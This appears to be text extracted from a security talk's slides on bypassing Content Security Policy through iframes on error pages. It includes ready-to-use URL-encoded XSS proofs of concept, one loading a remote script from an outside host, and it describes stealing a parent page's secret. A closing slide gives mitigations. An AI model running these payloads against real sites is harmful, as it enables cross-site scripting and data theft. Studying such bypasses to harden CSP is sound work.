This document discusses techniques for bypassing Content Security Policy (CSP) protections. It presents several examples of CSP bypasses, such as using long URLs to trigger errors, setting large cookies to trigger errors, and dynamically injecting scripts into iframes on error pages that lack CSP protections. The document argues that CSP headers must be configured carefully and present on all pages, including errors, to effectively prevent these bypasses.

1. CSP bypass
challenge
default-src 'self' 'unsafe-inline';
sandbox allow-forms allow-same-origin
allow-scripts allow-modals
hsts.pro/csp.php

4. https://deepsec.net/docs/Slides/2016/CSP_Is_Dead,_Long_Live_Strict_CSP!_Lukas_Weichselbaum.pdf

5. Content-Security-Policy: default-src 'self' 'unsafe-inline';

6. Content-Security-Policy: default-src 'self' 'unsafe-inline';

7. Content-Security-Policy: default-src 'self' 'unsafe-inline';

8. CSP BYPASS

11. Neatly bypassing CSP

13. CSP BYPASS

14. ?
Content-Security-Policy: default-src 'self' 'unsafe-inline';

16. frame=document.createElement("iframe")
frame.src="/css/bootstrap.min.css"
document.body.appendChild(frame)

17. script=document.createElement('script')
script.src='//bo0om.ru/csp.js’
let myframe = window.frames[0].document
myframe.head.appendChild(script)
+

18. PoC #1
http://hsts.pro/csp.php?xss=f=document.createElement(%22iframe%2
2);f.id=%22pwn%22;f.src=%22/robots.txt%22;f.onload=()=%3E%7Bx=do
cument.createElement(%27script%27);x.src=%27//bo0om.ru/csp.js%27
;pwn.contentWindow.document.body.appendChild(x)%7D;document.b
ody.appendChild(f);
OR
bit.ly/2MEip1P

19. X-Frame-Options: deny?

20. Nginx + /../ = 400

21. Apache + /%%z = 400

23. Nope?

24. What is the maximum length of a URL?

25. Nginx

26. Apache

27. frame=document.createElement("iframe")
frame.src="/"+"A".repeat(20000)
document.body.appendChild(frame)

28. Cookie

29. • Create a humongous cookie
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
• Open an iframe using any address, which will cause the server to return an error
(often without XFO or CSP)
• Remove the humongous cookie:
for(var i=0;i<5;i++){document.cookie=i+"="}
• Write your own js script into the frame that steals the parent’s secret

30. PoC #2
http://hsts.pro/csp.php?xss=for%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocu
ment.cookie=i%2b%22=%22%2b%22a%22.repeat%284000%29%7D;f=docum
ent.createElement%28%22iframe%22%29;f.id=%22pwn%22;f.src=%22/%22;f.
onload=%28%29=%3E%7Bfor%28var%20i=0;i%3C5;i%2b%2b%29%7Bdocum
ent.cookie=i%2b%22=%22%7D;x=document.createElement%28%27script%2
7%29;x.src=%27data:,alert%28%22Pwned%20%22%2btop.secret.textConten
t%29%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;d
ocument.body.appendChild%28f%29;
OR
bit.ly/2D1QOry

31. FixMe
• CSP headers should be present on all the pages, event on the error
pages returned by the web-server.
• CSP options should be configured to restrict the rights to just those
necessary to work with the specific resource. Try setting Content-
Security-Policy-Report-Only: default-src ‘none’ and gradually adding
permission rules for specific use cases.
• If you have to use unsafe-inline for correctly loading and processing
the resources, your only protection is to use nonce or hash-source.
Otherwise, you are exposed to XSS exploits and if CSP doesn’t protect,
why do you need it in the first place?!))

33. Q?